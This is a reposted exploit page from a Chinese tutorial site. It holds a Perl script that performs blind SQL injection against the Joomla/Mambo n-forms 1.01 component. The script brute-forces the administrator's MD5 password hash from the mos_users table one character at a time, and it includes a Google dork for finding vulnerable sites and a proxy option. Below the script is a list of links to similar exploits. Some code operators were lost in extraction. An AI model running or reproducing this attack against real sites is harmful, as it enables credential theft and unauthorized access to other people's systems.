手机
当前位置:查字典教程网 >网络安全 >Exploit >Joomla Component n-forms 1.01 Blind SQL Injection Exploit
Joomla Component n-forms 1.01 Blind SQL Injection Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n...

#!/usr/bin/perl

use LWP::UserAgent;

use Getopt::Long;

if(!$ARGV[1])

{

print " n";

print " ################################################################n";

print " # Mambot Component n-forms Blind SQL Injection Exploit #n";

print " # Author:The Moorish :D #n";

print " # Greetz:Team-dz,His0k4,x.CJP.x,Kader11000,c02,piRAte DIgitAL#n";

print " # sites:www.h4cnc.com ,www.dz-secure.com #n";

print " # Dork: inurl:com_n-forms #n";

print " # Usage: perl forms.pl host path <options> #n";

print " # Example: perl forms.pl www.host.com /path/ -f 10 #n";

print " # #n";

print " # Options: #n";

print " # -s Valid form id #n";

print " # Note: #n";

print " # You can change the match string if you need that #n";

print " ################################################################n";

exit;

}

my $host = $ARGV[0];

my $path = $ARGV[1];

my $userid = 1;

my $fid = $ARGV[2];

my %options = ();

GetOptions(%options, "u=i", "p=s", "f=i");

print "[~] Exploiting...n";

if($options{"u"})

{

$userid = $options{"u"};

}

if($options{"f"})

{

$fid = $options{"f"};

}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i )

{

my $f = 0;

my $h = 48;

while(!$f && $h <= 57)

{

if(istrue2($host, $path, $userid, $fid, $i, $h))

{

$f = 1;

syswrite(STDOUT, chr($h), 1);

}

$h ;

}

if(!$f)

{

$h = 97;

while(!$f && $h <= 122)

{

if(istrue2($host, $path, $userid, $fid, $i, $h))

{

$f = 1;

syswrite(STDOUT, chr($h), 1);

}

$h ;

}

}

}

print "n[~] Exploiting donen";

sub istrue2

{

my $host = shift;

my $path = shift;

my $uid = shift;

my $fid = shift;

my $i = shift;

my $h = shift;

my $ua = LWP::UserAgent->new;

my $query = "http://".$host.$path."index.php?option=com_n-forms&form_id=".$fid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1 ),".$i.",1))=".$h."";

if($options{"p"})

{

$ua->proxy('http', "http://".$options{"p"});

}

my $resp = $ua->get($query);

my $content = $resp->content;

my $regexp = "nfields";

if($content =~ /$regexp/)

{

return 1;

}

else

{

return 0;

}

}

【Joomla Component n-forms 1.01 Blind SQL Injection Exploit】相关文章:

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

LoveCMS 1.6.2 Final Remote Code Execution Exploit

BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

Joomla Component EZ Store Remote Blind SQL Injection Exploit

DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit

精品推荐
分类导航